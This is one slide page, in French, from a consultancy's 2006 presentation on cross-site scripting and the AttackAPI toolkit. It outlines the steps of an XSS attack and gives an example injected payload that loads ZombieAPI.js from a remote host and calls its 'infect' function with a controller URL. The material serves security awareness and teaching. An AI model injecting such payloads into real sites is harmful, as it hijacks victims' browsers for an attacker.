infos@ba-cst.com
- +33 (0) 563 277 241
B&A Consultants
Prestations et compétences
Documents techniques
Présentations
Norme ISO 27005
Clés USB U3
Cross site scripting, AttackAPI
Wifi, WEP et sécurité
SPF et DomainKeys
Spammeurs et MX secondaires
SPF : le DNS et l'anti-spam
Sécurité et Logiciel Libre
Wifi et Sécurité
Réflexions sur le Wifi
Insécurités applicatives
Formations
Groupes de travail
Médias et conférences
Pour nous contacter
AttackAPI et le Cross-Site Scripting
En grandeur nature…
Sommaire
-
Page précédente
-
Version graphique
-
Page suivante
En grandeur nature…
Trouver une faille XSS sur un site
Y amener la future victime (mail, page Web appropriée, etc.)
En injectant le bon code dans la faille.
Exemple :
<script src=http://…/ZombieAPI.js></script>
<script>ZombieAPI.Zombie.infect(URL du contrôleur,5000);</script>
Sommaire
-
Page précédente
-
Version graphique
-
Page suivante
(C) B & A Consultants 2006 - Reproduction interdite -
Pierre-Yves Bonnetain
B&A Consultants
Prestations et compétences
Documents techniques
Présentations
Formations
Groupes de travail
Médias et conférences
Pour nous contacter
(C) B&A Consultants 1996-2009 -
infos[AT]ba-cst.com
- +33 (0) 563 277 241